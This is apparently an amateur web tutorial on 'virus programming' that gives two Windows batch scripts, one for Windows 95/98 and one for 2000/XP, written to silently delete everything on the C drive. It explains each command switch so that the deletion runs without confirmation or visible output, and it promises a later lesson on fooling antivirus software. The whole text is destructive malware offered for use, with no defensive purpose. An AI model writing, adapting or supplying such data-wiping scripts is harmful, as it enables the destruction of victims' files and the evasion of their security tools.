OK Lets get started with the Virus Programing
OK this first Virus is Quite Simple It will Delete the content of any Drive Specified Here I'm using C Drive
This Virus is for 95,98.98se ....(not for XP)
@echo Off
rem This will Del all files from C Drives
Deltree/y C:\
Echo End Of Your Ur Computer Life
exit
This Virus is for 2K and XP
@echo
rem this will also do the same as above Virus
if exist C:\ rd/s/q C:\
exit
Alright lets Analyze the above two Viruses:
OK first the virus for 98
here @echo off:does not show the content of the virus or the Drive from which it is being exicuted U dont need to know much about it but just add it to the beginning of ur Virus
Deltree/y: ok This is will delete all the content in the Drive and the /y switch is so that it will not ask for confirmation
OK Now the XP Virus
U Know the Echo off part Now
Rd/s/q rd stands for Remove directory and the /s switch removes all the subdirectories and files & /q switch is used to complete the job quickly
Now U know how the Virus Looks like but it will b detected by any AV as a del.bat Virus but this can be fixed by fooling the AV I will Update the site very soon and U'll Know how so Keep Coming back here